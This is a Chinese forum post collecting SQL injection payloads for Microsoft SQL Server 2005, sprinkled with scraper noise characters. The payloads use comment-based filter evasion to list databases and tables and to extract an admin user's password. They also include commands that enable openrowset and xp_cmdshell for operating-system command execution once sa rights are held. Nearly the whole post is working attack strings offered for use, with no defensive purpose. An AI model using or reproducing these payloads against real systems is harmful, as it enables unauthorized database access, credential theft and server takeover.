MSsql2005注入语句

admin

9 R. g4 f9 R1 \! F' H[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
! e" [5 d4 o; h
5 T1 H2 n' H- c9 R+ B爆表语句,somedb部份是所要列的数据库，红色数字1累加
4 j  Y& O  S! T; M0 `& u

[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

8 B& d' x: M: t9 K' D5 ]爆字段语句，爆表admin里user='icerover'的密码段
7 Y+ q$ y$ q/ o* q; T  |) V" F

; M' K( h* e* R1 C" N& L[Copy to clipboard]CODE:
0 w/ \( o# ^  @**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
4 c. ]1 [/ E4 ?7 c* q4 r8 o如果是sa权限，可以这样来开启
8 s7 Y" _$ W. p( R6 q开启openrowset


) s5 ?0 {3 k2 U: ?8 s6 A" M[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
  Q9 s6 m" P" P% U% T; _+ x/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
6 f; N' g( t/ N2 E6 y1 t% o
开启xp_cmdshell


[Copy to clipboard]CODE:
4 m" c, G- G; a. E* z" LEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~晚安